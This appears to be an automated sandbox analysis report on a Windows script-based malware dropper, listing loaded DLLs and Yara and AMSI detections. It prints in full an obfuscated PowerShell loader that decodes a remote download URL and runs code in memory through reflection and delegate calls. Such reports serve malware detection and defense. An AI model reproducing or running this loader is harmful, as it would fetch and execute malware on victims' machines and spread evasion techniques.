                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.3049164389.000000000704D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vind", "0")
                Source: Yara matchFile source: 00000005.00000002.3057467096.0000000009F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3056701550.00000000083B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3043556156.0000000005624000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Aabningsdag)$global:Vandrende = [System.Text.Encoding]::ASCII.GetString($Rabban)$global:Bondable=$Vandrende.substring($Woodlike,$Bullwhack)<#Elsdyrhoved Smatterer Lsningsalternativet
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Upassende $Fichuer $Reexpel), (Omkredsen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Blennorrhea = [AppDomain]::CurrentDomain.GetAssemblies()$global:Wh
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sammenlgning)), $Detaljerer).DefineDynamicModule($Duad, $false).DefineType($Drearing, $Bibeloversttelse, [System.MulticastDelegate])$D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Aabningsdag)$global:Vandrende = [System.Text.Encoding]::ASCII.GetString($Rabban)$global:Bondable=$Vandrende.substring($Woodlike,$Bullwhack)<#Elsdyrhoved Smatterer Lsningsalternativet
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts Jump to behavior
                Source: 31437F.exe.7.drStatic PE information: section name: .didat
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D951F2 pushad ; iretd 2_2_00007FF848D952A9
